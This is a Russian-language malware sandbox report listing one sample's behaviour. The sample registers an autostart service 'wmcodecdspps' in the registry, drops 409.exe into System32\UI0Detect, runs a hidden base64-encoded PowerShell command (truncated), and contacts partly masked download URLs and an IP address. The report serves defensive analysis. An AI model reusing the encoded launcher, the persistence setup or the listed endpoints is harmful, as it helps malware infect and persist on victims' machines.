Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wmcodecdspps] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmcodecdspps] 'ImagePath' = '"<SYSTEM32>\UI0Detect\wmcodecdspps.exe"'
- 'wmcodecdspps' "<SYSTEM32>\UI0Detect\wmcodecdspps.exe"
- 'wmcodecdspps' <SYSTEM32>\UI0Detect\wmcodecdspps.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...
- %HOMEPATH%\409.exe
- <SYSTEM32>\ui0detect\wmcodecdspps.exe
- %HOMEPATH%\409.exe в <SYSTEM32>\ui0detect\wmcodecdspps.exe
- '95.#.180.128':80
- http://lo###izlee.com/wp-admin/Z6G5ZQ/
- http://95.#.180.128/TDQl35QipiD4/qFFCjUDNpML5Hn6Fl/G1sNQi/
- DNS ASK zo####trends.com
- DNS ASK lo###izlee.com
- '%HOMEPATH%\409.exe'
- '<SYSTEM32>\ui0detect\wmcodecdspps.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAFQAQQBIAEoAbwB5AGIAPQAnAFIARABDAFMAVgBlAG8AcAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AGAAUgBJAGAAVABZAGAAUABgAFIAbwBUAG8AQwBvAEwAIgAgAD...' (со скрытым окном)